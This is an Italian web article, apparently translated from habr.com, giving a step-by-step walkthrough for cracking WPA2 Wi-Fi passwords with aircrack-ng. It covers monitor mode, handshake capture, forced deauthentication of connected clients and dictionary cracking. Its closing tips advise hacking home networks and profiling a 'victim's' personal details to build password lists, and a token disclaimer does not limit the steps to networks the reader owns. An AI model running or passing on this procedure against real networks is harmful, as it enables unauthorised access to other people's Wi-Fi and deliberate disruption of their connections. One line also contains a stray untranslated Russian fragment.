Selezione della password Wi-Fi con l'utility aircrack-ng

Questo articolo è scritto esclusivamente a scopo informativo e di ricerca. Vi invitiamo a rispettare le norme operative sulle reti e la legge, nonché a mantenere sempre in mente la sicurezza informatica.

Introduzione

All'inizio degli anni '90, quando il Wi-Fi è apparso per la prima volta, è stato creato l'algoritmo Wired Equivalent Privacy, che doveva garantire la riservatezza delle reti Wi-Fi. Tuttavia, il WEP si è rivelato un algoritmo di protezione inefficace, facilmente violabile.

A sostituirlo è arrivato un nuovo algoritmo di protezione, il Wi-Fi Protected Access II (WPA2), utilizzato oggi dalla maggior parte dei punti di accesso Wi-Fi. WPA2 utilizza l'algoritmo di crittografia AES, difficile da violare.

E dove si trova la vulnerabilità?

Il difetto di WPA2 è che la password crittografata viene trasmessa al momento della connessione degli utenti durante il cosiddetto 4-way handshake (procedura di handshake a 4 vie). Se riusciamo a catturare l'handshake, possiamo scoprire la password crittografata e rimanere solo da decrittarla. Per questo scopo utilizzeremo aircrack-ng.

Come procedere con l'attacco?

Passo 1. Identificare l'interfaccia

Per prima cosa è necessario sapere quale interfaccia di rete ci serve, quindi digitiamo il comando:

$ ifconfig

Riceviamo una risposta:

eth0      nessuna estensione wireless.

wlan0     IEEE 802.11abgn  ESSID:off/any
Modalità:Gestita  Punto di Accesso: Non Associato   Tx-Power=15 dBm
Limite di retry corto:7   RTS thr:off   Fragment thr:off
Chiave di crittografia:off
Gestione dell'alimentazione:off

lo        nessuna estensione wireless

Nel mio caso ci sono solo tre interfacce, due delle quali non hanno estensioni wireless (no wireless extensions). Pertanto, ci interessa solo wlan0.

Passo 2. Passiamo l'adattatore di rete in modalità monitor.

Mettere l'adattatore di rete in modalità monitor ci permetterà di vedere il traffico wireless che ci passa vicino. Per fare ciò, inseriamo il comando:

$ airmon-ng start wlan0

Nota che airmon-ng ha rinominato la tua interfaccia (nel mio caso è diventata mon0, ma è consigliabile controllare).

Passo 3. Catturiamo il traffico.

Ora, quando il nostro adattatore di rete è in modalità monitor, possiamo catturare il traffico che ci passa accanto, utilizzando il comando airodump-ng. Inseriamo:

$ airodump-ng mon0

Selezione della password Wi-Fi con l'utility aircrack-ng

Nota che tutti i punti di accesso visibili sono elencati nella parte superiore dello schermo, mentre i clienti sono nella parte inferiore dello schermo.

Passo 4. Ci concentriamo sulla cattura di un punto di accesso specifico.

Il nostro prossimo passo è concentrare i nostri sforzi su uno dei punti di accesso e sul suo canale. Ci interessa il BSSID e il numero del canale del punto di accesso che intendiamo compromettere. Apriamo un altro terminale e digitiamo:

$ airodump-ng --bssid 08:86:30:74:22:76 -c 6 -w WPAcrack mon0

Selezione della password Wi-Fi con l'utility aircrack-ng

  • 08:86:30:74:22:76 BSSID del punto di accesso
  • -c 6 canale su cui opera il punto di accesso Wi-Fi
  • WPAcrack file in cui verrà registrato il handshake
  • mon0 adattatore di rete in modalità monitor

Come puoi vedere dallo screenshot sopra, ci stiamo concentrando sulla cattura dei dati da un punto di accesso con ESSID Belkin276 sul canale 6. Lascia il terminale aperto!

Passo 5. Ottenere il handshake

Per catturare la password crittografata, è necessario che un cliente si autentichi (si connetta al Wi-Fi). Se è già autenticato, possiamo disautenticarlo (disconnetterlo), in modo che il sistema si autentichi automaticamente di nuovo (si ricolleghi), permettendoci di ottenere la password crittografata.

Ciò significa che dobbiamo semplicemente disconnettere gli utenti connessi in modo che possano riconnettersi. Per fare ciò, apriamo un altro terminale e digitiamo:

$ aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0

Selezione della password Wi-Fi con l'utility aircrack-ng

  • 100 utenti che verranno disautenticati
  • 08:86:30:74:22:76 BSSID del punto di accesso
  • adattatore di rete mon0

Ora, quando ci riconnettiamo, la finestra che avevamo lasciato nel passaggio precedente rileverà il handshake. Torniamo al nostro terminale airodump-ng e diamo un'occhiata.

Selezione della password Wi-Fi con l'utility aircrack-ng

Nota la riga superiore a destra, airodump-ng ha mostrato: «Handshake WPA». Questo significa che abbiamo catturato con successo la password criptata! Questo è il primo passo verso il successo!

Passo 6. Tentativi di recupero della password

Ora che abbiamo la password criptata nel nostro file WPAcrack, possiamo avviare il recupero della password. Ma per farlo abbiamo bisogno di un elenco di password che vogliamo utilizzare. Puoi trovare un elenco del genere su Google in 5 minuti. Io, invece, utilizzerò l'elenco predefinito di password incluso in aircrack-ng: BackTrack darkcOde.

Apriamo un nuovo terminale e digitiamo:

$ aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de

Selezione della password Wi-Fi con l'utility aircrack-ng

  • Il file WPAcrack-01.cap in cui abbiamo registrato l'handshake (airodump-ng ha aggiunto alla fine -01.cap)
  • /pentest/passwords/wordlist/darkc0de абсолютный путь к списку паролей

Quanto tempo ci vorrà?

Questo processo può richiedere molto tempo. Tutto dipende dalla lunghezza della tua lista di password; potresti aspettare da pochi minuti a diversi giorni. Sul mio processore dual-core Intel, aircrack-ng riesce a testare poco più di 800 password al secondo.

Quando la password verrà trovata, apparirà sullo schermo. Che il tentativo di password abbia successo o meno dipende dalla tua lista. Se non riesci a trovare la password con una lista, non demoralizzarti, prova un’altra lista.

Consigli per l'uso

  1. Questo tipo di attacco è efficace per la selezione di password da una lista, ma praticamente inutile per un tentativo casuale. Il problema è il tempo. Se il Wi-Fi è protetto da una password media di lettere latine e numeri, la selezione casuale richiederà diversi anni.
  2. Quando scegli una lista di password, considera i fattori geografici. Ad esempio, non ha senso tentare di hackare in un ristorante di Parigi usando una lista di password russa.
  3. Se stai hackerando la rete Wi-Fi domestica, cerca di ottenere alcune informazioni personali sulla vittima (nome, cognome, data di nascita, soprannome del cane, ecc.) e genera una lista aggiuntiva di password basata su questi dati.
  4. Dopo aver catturato il handshake, disattivate il funzionamento di aireplay-ng (non costringete gli utenti normali a soffrire).

Fonte: habr.com

Acquista hosting affidabile per siti web con protezione DDoS, VPS VDS server 🔥 Acquista hosting affidabile per siti web con protezione DDoS, VPS VDS server | ProHoster